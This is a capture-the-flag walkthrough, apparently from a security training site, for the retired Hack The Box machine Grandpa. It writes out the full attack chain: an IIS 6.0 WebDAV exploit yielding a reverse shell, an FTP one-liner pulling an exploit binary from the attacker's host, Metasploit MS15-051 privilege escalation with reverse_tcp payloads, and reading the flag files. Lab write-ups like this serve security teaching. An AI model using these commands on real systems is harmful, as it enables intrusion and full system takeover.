Capture the flag (CTF)

Hack the Box (HTB) Machines Walkthrough Series — Grandpa

Continuing with our series on Hack The Box (HTB) machines, this article contains the walkthrough of an HTB machine named Grandpa.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges as well. Individuals have to solve the puzzle (simple enumeration plus pentest) in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.

Note: Writeups of only retired HTB machines are allowed. The machine in this article, named Grandpa, is retired.

The Walkthrough

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The Grandpa machine IP is 10.10.10.14.

3. We will adopt the same methodology of performing penetration testing as we’ve used before. Let’s start with enumeration in order to gain as much information about the machine as possible.

4. As usual, let’s start with the Nmap scan to gather more information about the services running on this machine.
<<nmap -sC -sV -oA grandpa 10.10.10.14>>

5. As we can see, port 80 is opened with IIS 6.0 running under it.

6. Looking for exploits for IIS 6.0, we can see that it has a number of exploits. One we will use is this.

7. Here is a sample exploit for the abovementioned vulnerability. We’ll download it as exploit.py and run it like below. (Note: Make sure to revert the box before running this.)
<< python exploit.py 10.10.10.14 80 <attacking machine ip> 80>>

8. Opening port 1234 on our attacking machine as with nc, we can see that we get a reverse shell back.

9. Looking into what roles/permissions we got in the reverse shell, it looks like we got the “nt authority/network service” account (which has very few privileges).

10. Now to escalate privileges, we can use Windows Exploit Suggester. One of the things this file needs is the system info. Run systeminfo on the victim machine and save it as system.txt on the attacking machine.

11. First, update the Windows Exploit Suggester by using the following command.
<< python windows-exploit-suggester.py --update >>

12. Now since the Windows Exploit Suggester database is updated, let’s run the utility to check for possible exploits on this machine.
<< python windows-exploit-suggester.py --database 2018-12-29-mssb.xlsx --systeminfo system.txt >>

13. Above, we can see that the with current machine profile, lot of exploits are possible. We can try with MS15-051.

14. We can clone all the popular Windows exploits in compiled form from this repo.

15. Now the next challenge is to transfer the files from the attacking machine to the target machine.

16. Since we saw in the nmap results that PUT options are enabled, we can try exploiting that with a utility such as Cadaver.
<< cadaver http://10.10.10.14/dav>>

17. Above, we can see that the permission is denied; although the PUT option is enabled, there is no direct writable directory and even there are no valid collections.

18. The next thing we can try is to use something that is in the target box already. Since this is a 2003 SP2 box, we can use the FTP utility to transfer the .exe file.

19. Before that, we need to find a writable directory on the victim box.
<< dir >>

20. From above, directory “wmpub” is writable. Before we run the ftp command to fetch the binary, we need to host the binary from our attacking machine via ftp service.

21. Run the below command to host everything in the directory via FTP service. (Make sure to copy the MS15-052 exe into the directory).
<< python -m pyftpdlib -p 21>>

22. After the binary is hosted, run the below to connect and download the relevant binary from the attacking machine.
<< echo open 10.10.14.6>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get ms15051.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt >>

23. After that, we can see below that the FTP session was created, and the relevant binary was downloaded.

24. Running the downloaded binary on the victim machine hangs the machine. I tried multiple other exploits as well but with same results.

25. Since the above approach did not work, let’s route towards using Metasploit. We will just replicate the above strategy and exploits via Metasploit to see if it can help us to escalate privileges.

26. First, revert the machine and run the msfconsole.

27. Use exploit/windows/iis/iis_webdav_scstoragepathfromurl. As we can see below, set options.

<< use exploit/windows/iis/iis_webdav_scstoragepathfromurl>>

<< options >>

<< set RHOST 10.10.10.14>>

<<set LHOST <attacking machine ip> >>

<<set LPORT 1234>>

28. After setting the options, run the exploit and a reverse Meterpreter TCP shell should be spawned.
<< exploit >>

29. Since we now need to escalate the privileges, let’s background this process and use exploit/windows/local/ms15_051_client_copy_image.

<< use exploits/windows/local/ms15_051_client_copy_image >>

<< options >>

30. As we can see that it required the valid sessions, setting that to be the SESSION 1 opened as meterpreter shell.
<< set SESSION 1>>

31. After that, we’ll be setting the payload windows/meterpreter/reverse_tcp like below:

<< set payload windows/meterpreter/reverse_tcp >>

<< set LHOST <attacking machine ip> >>

<< set LPORT 4422 >>

32. We run the exploit and it failed as well, since the current Meterpreter shell from SESSION 1 does not even have the permissions to perform getuid.
<< exploit >>

33. Confirming that by routing back to the main session and running the getuid command.

<<sessions -1>>

<< getuid >>

34. Note that in manual process earlier, we got the shell with “network service.”

35. Let’s try to migrate the current Meterpreter process to a process under “network service.” In this case, we choose 1804.

<<migrate 1804>>

<<getuid>>

36. After the successful migration, running the getuid command produces the desired output.

37. Now background this session, go back to the other session for ms15-051 and run the exploit.

<<options>>

<< exploit>>

<< getuid >>

38. The exploit ran successfully, and we got the SYSTEM shell.

39. Running post commands such as shell to spawn a command shell.
<< shell >>

40. Browsing the “Documents and Settings/Harry/Desktop” to grab the user.txt file.

<< cd “Documents and Settings/Harry/Desktop”>>

<< type user.txt >>

41. Browsing the “Documents and Settings/Administrator/Desktop” to grab the root.txt file.

<< cd “Documents and Settings/Administrator/Desktop”>>

<< type root.txt >>

We did it!

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

This was a real fun box with some really old vulnerabilities. I will try to run it completely without Metasploit as usual. We will continue this series with more such interesting machines.